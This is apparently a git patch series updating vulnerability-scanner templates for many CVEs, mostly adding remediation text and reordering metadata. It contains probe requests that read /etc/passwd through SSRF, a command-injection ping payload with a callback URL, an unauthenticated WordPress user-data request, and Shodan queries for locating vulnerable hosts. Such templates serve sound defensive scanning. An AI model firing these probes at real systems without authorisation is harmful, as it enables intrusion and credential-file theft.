https://www.plsanu.com/vehicle-service-management-system-category-list-stored-cross-site-scripting-xss @@ -17,11 +19,11 @@ info: cve-id: CVE-2021-46071 cwe-id: CWE-79 epss-score: 0.00084 - cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* epss-percentile: 0.34592 + cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: vehicle_service_management_system_project product: vehicle_service_management_system tags: cve,cve2021,xss,vms,authenticated diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml index 8d57820f77..736f0a24e1 100644 --- a/http/cves/2021/CVE-2021-46072.yaml +++ b/http/cves/2021/CVE-2021-46072.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Service List section in login panel. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS - https://www.plsanu.com/vehicle-service-management-system-service-list-stored-cross-site-scripting-xss @@ -17,11 +19,11 @@ info: cve-id: CVE-2021-46072 cwe-id: CWE-79 epss-score: 0.00084 - cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* epss-percentile: 0.34592 + cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: vehicle_service_management_system_project product: vehicle_service_management_system tags: cve,cve2021,xss,vms,authenticated diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml index a7c04dd532..628138141b 100644 --- a/http/cves/2021/CVE-2021-46073.yaml +++ b/http/cves/2021/CVE-2021-46073.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Vehicle Service Management System 1.0 contains a cross-site scripting vulnerability via the User List section in login panel. + remediation: | + To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. Additionally, web application firewalls (WAFs) can be employed to detect and block XSS attacks. reference: - https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS - https://www.plsanu.com/vehicle-service-management-system-user-list-stored-cross-site-scripting-xss @@ -17,11 +19,11 @@ info: cve-id: CVE-2021-46073 cwe-id: CWE-79 epss-score: 0.00084 - cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* epss-percentile: 0.34592 + cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: vehicle_service_management_system_project product: vehicle_service_management_system tags: cve,cve2021,xss,vms,authenticated diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index 466d24fa8a..488ee43d2e 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the Server Side Request Forgery vulnerability. reference: - https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py - https://nvd.nist.gov/vuln/detail/CVE-2021-46107 @@ -15,10 +17,10 @@ info: cve-id: CVE-2021-46107 cwe-id: CWE-918 metadata: - fofa-query: title="Ligeo" + verified: true max-request: 3 shodan-query: title:"Ligeo" - verified: true + fofa-query: title="Ligeo" tags: cve,cve2021,ligeo,ssrf,lfr http: @@ -26,11 +28,9 @@ http: - | GET / HTTP/1.1 Host: {{Hostname}} - - | GET /archive/download?file=file:///etc/passwd HTTP/1.1 Host: {{Hostname}} - - | GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2021/CVE-2021-46379.yaml b/http/cves/2021/CVE-2021-46379.yaml index 3aeb0c27f1..38e192dc21 100644 --- a/http/cves/2021/CVE-2021-46379.yaml +++ b/http/cves/2021/CVE-2021-46379.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: DLink DIR850 ET850-1.08TRb03 contains incorrect access control vulnerability in URL redirection, which can be used to mislead users to go to untrusted sites. + remediation: | + Apply the latest firmware update provided by D-Link to fix the open redirect vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-46379 - https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/view @@ -16,11 +18,11 @@ info: cve-id: CVE-2021-46379 cwe-id: CWE-601 epss-score: 0.00247 - cpe: cpe:2.3:o:dlink:dir-850l_firmware:1.08trb03:*:*:*:*:*:*:* epss-percentile: 0.61872 + cpe: cpe:2.3:o:dlink:dir-850l_firmware:1.08trb03:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: dlink product: dir-850l_firmware tags: cve,cve2021,redirect,dlink,router diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml index 0b393ebf37..4ef1d7df94 100644 --- a/http/cves/2021/CVE-2021-46381.yaml +++ b/http/cves/2021/CVE-2021-46381.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow]. + remediation: | + Apply the latest firmware update provided by D-Link to fix the local file inclusion vulnerability. reference: - https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing - https://www.dlink.com/en/security-bulletin/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-46381 cwe-id: CWE-22 epss-score: 0.01229 - cpe: cpe:2.3:o:dlink:dap-1620_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.8365 + cpe: cpe:2.3:o:dlink:dap-1620_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index 3a5c61f08a..df42c29812 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDk severity: medium description: ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks. + remediation: | + Apply the latest security patches or firmware updates provided by Zyxel to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/50797 - https://www.zyxel.com/us/en/support/security_advisories.shtml @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-46387 cwe-id: CWE-79 epss-score: 0.00475 - cpe: cpe:2.3:o:zyxel:zywall_2_plus_internet_security_appliance_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.72639 + cpe: cpe:2.3:o:zyxel:zywall_2_plus_internet_security_appliance_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"Zywall2Plus" vendor: zyxel product: zywall_2_plus_internet_security_appliance_firmware + shodan-query: http.title:"Zywall2Plus" tags: cve,cve2021,xss,zyxel,edb http: diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 8c160dd35d..7abb32283b 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges. + remediation: | + Apply the latest security patch or update provided by Franklin Fueling Systems to fix the LFI vulnerability. reference: - https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html - https://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-R @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-46417 cwe-id: CWE-22 epss-score: 0.72699 - cpe: cpe:2.3:o:franklinfueling:colibri_firmware:1.8.19.8580:*:*:*:*:*:*:* epss-percentile: 0.97658 + cpe: cpe:2.3:o:franklinfueling:colibri_firmware:1.8.19.8580:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Franklin Fueling Systems" verified: true + max-request: 1 vendor: franklinfueling product: colibri_firmware + shodan-query: http.html:"Franklin Fueling Systems" tags: packetstorm,cve,cve2021,franklinfueling,lfi http: diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml index b78a305c13..0e244d0f7f 100644 --- a/http/cves/2021/CVE-2021-46422.yaml +++ b/http/cves/2021/CVE-2021-46422.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication. + remediation: | + Upgrade to a patched version of SDT-CW3B1 or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/50936 - https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T? @@ -18,14 +20,14 @@ info: cve-id: CVE-2021-46422 cwe-id: CWE-78 epss-score: 0.95441 - cpe: cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.1.0:*:*:*:*:*:*:* epss-percentile: 0.99106 + cpe: cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.1.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: html:"SDT-CW3B1" verified: true + max-request: 1 vendor: telesquare product: sdt-cs3b1_firmware + shodan-query: html:"SDT-CW3B1" tags: packetstorm,cve,cve2021,telesquare,rce,router,injection,edb variables: cmd: "ping${IFS}-c${IFS}1${IFS}{{interactsh-url}}" diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index 4591c8fc78..81b42b9952 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request. + remediation: | + Apply the latest patch or update provided by the vendor to fix the vulnerability. reference: - https://dl.packetstormsecurity.net/2205-exploits/tlr2005ksh-filedelete.txt - https://drive.google.com/drive/folders/1_e3eJ8fzhCWnCkoRpbLoyQecuKkPR4OD?usp=sharing @@ -16,14 +18,14 @@ info: cve-id: CVE-2021-46424 cwe-id: CWE-306 epss-score: 0.01459 - cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:1.0.0:*:*:*:*:*:*:* epss-percentile: 0.85053 + cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:1.0.0:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: http.html:"TLR-2005KSH" verified: true + max-request: 3 vendor: telesquare product: tlr-2005ksh_firmware + shodan-query: http.html:"TLR-2005KSH" tags: cve,cve2021,telesquare,intrusive,packetstorm http: diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index f7c4d426a9..718396095d 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check. + remediation: | + Upgrade to a patched version of GenieACS or apply the necessary security patches to mitigate the vulnerability. reference: - https://twitter.com/shaybt12/status/1671598239835906058 - https://github.com/advisories/GHSA-2877-693q-pj33 @@ -18,14 +20,14 @@ info: cve-id: CVE-2021-46704 cwe-id: CWE-78 epss-score: 0.94979 - cpe: cpe:2.3:a:genieacs:genieacs:*:*:*:*:*:*:*:* epss-percentile: 0.98995 + cpe: cpe:2.3:a:genieacs:genieacs:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.favicon.hash:-2098066288 + max-request: 1 vendor: genieacs product: genieacs + shodan-query: http.favicon.hash:-2098066288 tags: cve,cve2021,genieacs,rce http: diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492 2.yaml similarity index 100% rename from http/cves/2023/CVE-2023-23492.yaml rename to http/cves/2023/CVE-2023-23492 2.yaml From 09c59282c4c397e43b0f89729b46888e17ee70e3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 6 Sep 2023 17:52:30 +0530 Subject: [PATCH 0191/1090] fixed lint error --- http/cves/2023/CVE-2023-32117 2.yaml | 46 ---------------------------- 1 file changed, 46 deletions(-) delete mode 100644 http/cves/2023/CVE-2023-32117 2.yaml diff --git a/http/cves/2023/CVE-2023-32117 2.yaml b/http/cves/2023/CVE-2023-32117 2.yaml deleted file mode 100644 index e426d8e267..0000000000 --- a/http/cves/2023/CVE-2023-32117 2.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2023-32117 - -info: - name: Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints - author: DhiyaneshDK - severity: high - description: | - The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more. - remediation: Fixed in 1.2.0 - reference: - - https://github.com/RandomRobbieBF/CVE-2023-32117 - - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/integrate-google-drive/integrate-google-drive-1199-missing-authorization-via-rest-api-endpoints - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L - cvss-score: 7.3 - cve-id: CVE-2023-32117 - metadata: - verified: true - max-request: 1 - publicwww-query: "/wp-content/plugins/integrate-google-drive/" - tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,integrate-google-drive - -http: - - method: POST - path: - - "{{BaseURL}}/wp-json/igd/v1/get-users-data" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"username":' - - '"name":' - - '"email":' - - '"role":' - condition: and - - - type: word - part: header - words: - - 'application/json' - - - type: status - status: - - 200 From 7d9d59ab58e5f4d4cff21e81334a44e5a2abe433 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 6 Sep 2023 17:52:36 +0530 Subject: [PATCH 0192/1090] updated 2020 CVEs --- http/cves/2020/CVE-2020-0618.yaml | 4 +++- http/cves/2020/CVE-2020-10148.yaml | 4 +++- http/cves/2020/CVE-2020-10199.yaml | 4 +++- http/cves/2020/CVE-2020-10220.yaml | 7 ++++--- http/cves/2020/CVE-2020-10546.yaml | 4 +++- http/cves/2020/CVE-2020-10547.yaml | 4 +++- http/cves/2020/CVE-2020-10548.yaml | 4 +++- http/cves/2020/CVE-2020-10549.yaml | 4 +++- http/cves/2020/CVE-2020-10770.yaml | 4 +++- http/cves/2020/CVE-2020-10973.yaml | 8 +++++--- http/cves/2020/CVE-2020-11034.yaml | 4 ++-- http/cves/2020/CVE-2020-11110.yaml | 6 +++--- http/cves/2020/CVE-2020-11450.yaml | 4 ++-- http/cves/2020/CVE-2020-11455.yaml | 4 +++- http/cves/2020/CVE-2020-11529.yaml | 4 +++- http/cves/2020/CVE-2020-11530.yaml | 8 +++++--- http/cves/2020/CVE-2020-11546.yaml | 6 ++++-- http/cves/2020/CVE-2020-11547.yaml | 8 +++++--- http/cves/2020/CVE-2020-11710.yaml | 6 ++++-- http/cves/2020/CVE-2020-11738.yaml | 6 ++++-- http/cves/2020/CVE-2020-11798.yaml | 8 +++++--- http/cves/2020/CVE-2020-11853.yaml | 4 +++- http/cves/2020/CVE-2020-11854.yaml | 4 +++- http/cves/2020/CVE-2020-11930.yaml | 8 +++++--- http/cves/2020/CVE-2020-11978.yaml | 8 ++++---- http/cves/2020/CVE-2020-11991.yaml | 6 +++--- http/cves/2020/CVE-2020-12054.yaml | 6 ++++-- http/cves/2020/CVE-2020-12116.yaml | 4 +++- http/cves/2020/CVE-2020-12127.yaml | 8 +++++--- http/cves/2020/CVE-2020-12447.yaml | 4 +++- http/cves/2020/CVE-2020-12478.yaml | 8 +++++--- http/cves/2020/CVE-2020-12720.yaml | 4 +++- http/cves/2020/CVE-2020-12800.yaml | 6 ++++-- http/cves/2020/CVE-2020-13117.yaml | 8 +++++--- http/cves/2020/CVE-2020-13121.yaml | 4 +++- http/cves/2020/CVE-2020-13158.yaml | 4 +++- http/cves/2020/CVE-2020-13167.yaml | 4 +++- http/cves/2020/CVE-2020-13258.yaml | 4 +++- http/cves/2020/CVE-2020-13379.yaml | 7 ++++--- http/cves/2020/CVE-2020-13405.yaml | 8 +++++--- http/cves/2020/CVE-2020-13483.yaml | 4 +++- http/cves/2020/CVE-2020-13700.yaml | 6 ++++-- http/cves/2020/CVE-2020-13820.yaml | 8 +++++--- http/cves/2020/CVE-2020-13927.yaml | 10 +++++----- http/cves/2020/CVE-2020-13937.yaml | 4 +++- http/cves/2020/CVE-2020-13942.yaml | 4 ++-- http/cves/2020/CVE-2020-13945.yaml | 4 +++- http/cves/2020/CVE-2020-14092.yaml | 6 ++++-- http/cves/2020/CVE-2020-14144.yaml | 8 ++++---- http/cves/2020/CVE-2020-14179.yaml | 6 ++++-- http/cves/2020/CVE-2020-14181.yaml | 6 ++++-- http/cves/2020/CVE-2020-14408.yaml | 6 ++++-- http/cves/2020/CVE-2020-14413.yaml | 4 +++- http/cves/2020/CVE-2020-14750.yaml | 8 +++++--- http/cves/2020/CVE-2020-14864.yaml | 4 +++- http/cves/2020/CVE-2020-14882.yaml | 4 +++- http/cves/2020/CVE-2020-14883.yaml | 8 +++++--- http/cves/2020/CVE-2020-15050.yaml | 4 +++- http/cves/2020/CVE-2020-15129.yaml | 4 +++- http/cves/2020/CVE-2020-15148.yaml | 4 ++-- http/cves/2020/CVE-2020-15227.yaml | 4 +++- http/cves/2020/CVE-2020-15500.yaml | 4 +++- http/cves/2020/CVE-2020-15505.yaml | 4 +++- http/cves/2020/CVE-2020-15568.yaml | 4 +++- http/cves/2020/CVE-2020-15867.yaml | 6 ++++-- http/cves/2020/CVE-2020-15895.yaml | 6 ++++-- http/cves/2020/CVE-2020-15920.yaml | 4 +++- http/cves/2020/CVE-2020-16139.yaml | 4 +++- http/cves/2020/CVE-2020-16846.yaml | 4 +++- http/cves/2020/CVE-2020-16952.yaml | 4 +++- http/cves/2020/CVE-2020-17362.yaml | 6 ++++-- http/cves/2020/CVE-2020-17453.yaml | 4 +++- http/cves/2020/CVE-2020-17456.yaml | 4 +++- http/cves/2020/CVE-2020-17463.yaml | 8 ++++---- http/cves/2020/CVE-2020-17496.yaml | 4 +++- http/cves/2020/CVE-2020-17505.yaml | 4 +++- http/cves/2020/CVE-2020-17506.yaml | 4 +++- http/cves/2020/CVE-2020-17518.yaml | 4 +++- http/cves/2020/CVE-2020-17519.yaml | 4 +++- http/cves/2020/CVE-2020-17526.yaml | 8 ++++---- http/cves/2020/CVE-2020-17530.yaml | 4 +++- http/cves/2020/CVE-2020-18268.yaml | 4 +++- http/cves/2020/CVE-2020-19282.yaml | 4 +++- http/cves/2020/CVE-2020-19283.yaml | 4 +++- http/cves/2020/CVE-2020-19295.yaml | 6 ++++-- http/cves/2020/CVE-2020-19360.yaml | 4 +++- http/cves/2020/CVE-2020-1943.yaml | 4 +++- http/cves/2020/CVE-2020-19515.yaml | 8 +++++--- http/cves/2020/CVE-2020-1956.yaml | 8 +++++--- http/cves/2020/CVE-2020-19625.yaml | 4 +++- http/cves/2020/CVE-2020-20285.yaml | 8 +++++--- http/cves/2020/CVE-2020-20300.yaml | 8 +++++--- http/cves/2020/CVE-2020-2036.yaml | 6 +++--- http/cves/2020/CVE-2020-2096.yaml | 8 +++++--- http/cves/2020/CVE-2020-20982.yaml | 6 ++++-- http/cves/2020/CVE-2020-20988.yaml | 6 ++++-- http/cves/2020/CVE-2020-21012.yaml | 6 ++++-- http/cves/2020/CVE-2020-2103.yaml | 6 ++++-- http/cves/2020/CVE-2020-21224.yaml | 4 +++- http/cves/2020/CVE-2020-2140.yaml | 6 ++++-- http/cves/2020/CVE-2020-22208.yaml | 8 +++++--- http/cves/2020/CVE-2020-22209.yaml | 8 +++++--- http/cves/2020/CVE-2020-22210.yaml | 8 +++++--- http/cves/2020/CVE-2020-22211.yaml | 8 +++++--- http/cves/2020/CVE-2020-22840.yaml | 4 +++- http/cves/2020/CVE-2020-23015.yaml | 4 +++- http/cves/2020/CVE-2020-23517.yaml | 10 ++++++---- http/cves/2020/CVE-2020-23575.yaml | 4 +++- http/cves/2020/CVE-2020-23697.yaml | 6 ++++-- http/cves/2020/CVE-2020-23972.yaml | 6 ++++-- http/cves/2020/CVE-2020-24148.yaml | 6 ++++-- http/cves/2020/CVE-2020-24186.yaml | 6 ++++-- http/cves/2020/CVE-2020-24223.yaml | 4 +++- http/cves/2020/CVE-2020-24312.yaml | 6 ++++-- http/cves/2020/CVE-2020-24391.yaml | 6 ++++-- http/cves/2020/CVE-2020-24550.yaml | 4 +++- http/cves/2020/CVE-2020-24571.yaml | 4 +++- http/cves/2020/CVE-2020-24579.yaml | 4 +++- http/cves/2020/CVE-2020-24589.yaml | 4 +++- http/cves/2020/CVE-2020-24902.yaml | 10 ++++++---- http/cves/2020/CVE-2020-24903.yaml | 10 ++++++---- http/cves/2020/CVE-2020-24912.yaml | 4 +++- http/cves/2020/CVE-2020-24949.yaml | 4 +++- http/cves/2020/CVE-2020-25078.yaml | 4 +++- http/cves/2020/CVE-2020-25213.yaml | 6 ++++-- http/cves/2020/CVE-2020-25223.yaml | 4 +++- http/cves/2020/CVE-2020-25495.yaml | 4 +++- http/cves/2020/CVE-2020-25506.yaml | 4 +++- http/cves/2020/CVE-2020-2551.yaml | 4 +++- http/cves/2020/CVE-2020-25540.yaml | 4 +++- http/cves/2020/CVE-2020-25780.yaml | 4 +++- http/cves/2020/CVE-2020-25864.yaml | 4 ++-- http/cves/2020/CVE-2020-26073.yaml | 2 ++ http/cves/2020/CVE-2020-26153.yaml | 6 ++++-- http/cves/2020/CVE-2020-26214.yaml | 4 +++- http/cves/2020/CVE-2020-26217.yaml | 4 ++-- http/cves/2020/CVE-2020-26248.yaml | 8 ++++---- http/cves/2020/CVE-2020-26258.yaml | 4 ++-- http/cves/2020/CVE-2020-26413.yaml | 6 ++++-- http/cves/2020/CVE-2020-26876.yaml | 6 ++++-- http/cves/2020/CVE-2020-26919.yaml | 4 +++- http/cves/2020/CVE-2020-26948.yaml | 4 +++- http/cves/2020/CVE-2020-27191.yaml | 4 +++- http/cves/2020/CVE-2020-2733.yaml | 8 +++++--- http/cves/2020/CVE-2020-27361.yaml | 4 +++- http/cves/2020/CVE-2020-27467.yaml | 4 +++- http/cves/2020/CVE-2020-27481.yaml | 6 ++++-- http/cves/2020/CVE-2020-27735.yaml | 4 +++- http/cves/2020/CVE-2020-27866.yaml | 4 +++- http/cves/2020/CVE-2020-27982.yaml | 6 ++++-- http/cves/2020/CVE-2020-27986.yaml | 4 ++-- http/cves/2020/CVE-2020-28185.yaml | 8 +++++--- http/cves/2020/CVE-2020-28188.yaml | 4 +++- http/cves/2020/CVE-2020-28208.yaml | 4 +++- http/cves/2020/CVE-2020-28351.yaml | 4 +++- http/cves/2020/CVE-2020-28871.yaml | 4 +++- http/cves/2020/CVE-2020-28976.yaml | 6 ++++-- http/cves/2020/CVE-2020-29164.yaml | 4 +++- http/cves/2020/CVE-2020-29227.yaml | 4 +++- http/cves/2020/CVE-2020-29284.yaml | 6 ++++-- http/cves/2020/CVE-2020-29395.yaml | 6 ++++-- http/cves/2020/CVE-2020-29453.yaml | 6 ++++-- http/cves/2020/CVE-2020-29583.yaml | 8 +++++--- http/cves/2020/CVE-2020-29597.yaml | 6 ++++-- http/cves/2020/CVE-2020-3187.yaml | 4 +++- http/cves/2020/CVE-2020-3452.yaml | 4 +++- http/cves/2020/CVE-2020-35234.yaml | 6 +++--- http/cves/2020/CVE-2020-35338.yaml | 4 +++- http/cves/2020/CVE-2020-35476.yaml | 8 +++++--- http/cves/2020/CVE-2020-35489.yaml | 6 ++++-- http/cves/2020/CVE-2020-35580.yaml | 4 +++- http/cves/2020/CVE-2020-35598.yaml | 4 +++- http/cves/2020/CVE-2020-35713.yaml | 4 +++- http/cves/2020/CVE-2020-35729.yaml | 4 +++- http/cves/2020/CVE-2020-35736.yaml | 4 +++- http/cves/2020/CVE-2020-35749.yaml | 6 ++++-- http/cves/2020/CVE-2020-35774.yaml | 4 +++- http/cves/2020/CVE-2020-3580.yaml | 4 +++- http/cves/2020/CVE-2020-35846.yaml | 4 +++- http/cves/2020/CVE-2020-35847.yaml | 8 +++++--- http/cves/2020/CVE-2020-35848.yaml | 4 +++- http/cves/2020/CVE-2020-35951.yaml | 6 ++++-- http/cves/2020/CVE-2020-35984.yaml | 6 ++++-- http/cves/2020/CVE-2020-35985.yaml | 6 ++++-- http/cves/2020/CVE-2020-35986.yaml | 6 ++++-- http/cves/2020/CVE-2020-35987.yaml | 6 ++++-- http/cves/2020/CVE-2020-36112.yaml | 4 +++- http/cves/2020/CVE-2020-36289.yaml | 6 ++++-- http/cves/2020/CVE-2020-36365.yaml | 6 ++++-- http/cves/2020/CVE-2020-36510.yaml | 8 +++++--- http/cves/2020/CVE-2020-4463.yaml | 6 ++++-- http/cves/2020/CVE-2020-5191.yaml | 6 ++++-- http/cves/2020/CVE-2020-5192.yaml | 6 ++++-- http/cves/2020/CVE-2020-5284.yaml | 4 ++-- http/cves/2020/CVE-2020-5307.yaml | 4 +++- http/cves/2020/CVE-2020-5405.yaml | 4 +++- http/cves/2020/CVE-2020-5410.yaml | 4 +++- http/cves/2020/CVE-2020-5412.yaml | 6 ++++-- http/cves/2020/CVE-2020-5775.yaml | 4 +++- http/cves/2020/CVE-2020-5776.yaml | 6 ++++-- http/cves/2020/CVE-2020-5777.yaml | 6 ++++-- http/cves/2020/CVE-2020-5847.yaml | 4 +++- http/cves/2020/CVE-2020-5902.yaml | 4 +++- http/cves/2020/CVE-2020-6171.yaml | 4 +++- http/cves/2020/CVE-2020-6207.yaml | 4 +++- http/cves/2020/CVE-2020-6287.yaml | 8 +++++--- http/cves/2020/CVE-2020-6308.yaml | 4 +++- http/cves/2020/CVE-2020-6637.yaml | 6 ++++-- http/cves/2020/CVE-2020-7107.yaml | 8 ++++---- http/cves/2020/CVE-2020-7136.yaml | 4 ++-- http/cves/2020/CVE-2020-7209.yaml | 4 ++-- http/cves/2020/CVE-2020-7318.yaml | 4 +++- http/cves/2020/CVE-2020-7796.yaml | 4 +++- http/cves/2020/CVE-2020-7943.yaml | 4 +++- http/cves/2020/CVE-2020-7961.yaml | 4 +++- http/cves/2020/CVE-2020-7980.yaml | 6 ++++-- http/cves/2020/CVE-2020-8115.yaml | 4 ++-- http/cves/2020/CVE-2020-8163.yaml | 4 +++- http/cves/2020/CVE-2020-8191.yaml | 4 +++- http/cves/2020/CVE-2020-8193.yaml | 4 +++- http/cves/2020/CVE-2020-8194.yaml | 4 +++- http/cves/2020/CVE-2020-8209.yaml | 4 +++- http/cves/2020/CVE-2020-8497.yaml | 4 +++- http/cves/2020/CVE-2020-8512.yaml | 6 ++++-- http/cves/2020/CVE-2020-8515.yaml | 4 ++-- http/cves/2020/CVE-2020-8641.yaml | 4 +++- http/cves/2020/CVE-2020-8644.yaml | 4 +++- http/cves/2020/CVE-2020-8654.yaml | 4 +++- http/cves/2020/CVE-2020-8771.yaml | 6 ++++-- http/cves/2020/CVE-2020-8772.yaml | 8 ++++---- http/cves/2020/CVE-2020-8813.yaml | 4 +++- http/cves/2020/CVE-2020-8982.yaml | 4 +++- http/cves/2020/CVE-2020-9036.yaml | 4 +++- http/cves/2020/CVE-2020-9043.yaml | 8 +++++--- http/cves/2020/CVE-2020-9047.yaml | 4 +++- http/cves/2020/CVE-2020-9054.yaml | 4 +++- http/cves/2020/CVE-2020-9315.yaml | 4 +++- http/cves/2020/CVE-2020-9344.yaml | 8 +++++--- http/cves/2020/CVE-2020-9376.yaml | 4 +++- http/cves/2020/CVE-2020-9402.yaml | 4 ++-- http/cves/2020/CVE-2020-9425.yaml | 4 +++- http/cves/2020/CVE-2020-9483.yaml | 4 +++- http/cves/2020/CVE-2020-9484.yaml | 6 ++++-- http/cves/2020/CVE-2020-9496.yaml | 4 +++- http/cves/2020/CVE-2020-9757.yaml | 4 +++- http/cves/2021/CVE-2021-46073.yaml | 2 +- 246 files changed, 857 insertions(+), 421 deletions(-) diff --git a/http/cves/2020/CVE-2020-0618.yaml b/http/cves/2020/CVE-2020-0618.yaml index 5129d58833..363f686b70 100644 --- a/http/cves/2020/CVE-2020-0618.yaml +++ b/http/cves/2020/CVE-2020-0618.yaml @@ -5,6 +5,8 @@ info: author: joeldeleep severity: high description: Microsoft SQL Server Reporting Services is vulnerable to a remote code execution vulnerability because it incorrectly handles page requests. + remediation: | + Apply the latest security updates provided by Microsoft to mitigate this vulnerability. reference: - https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/ - https://github.com/euphrat1ca/CVE-2020-0618 @@ -17,8 +19,8 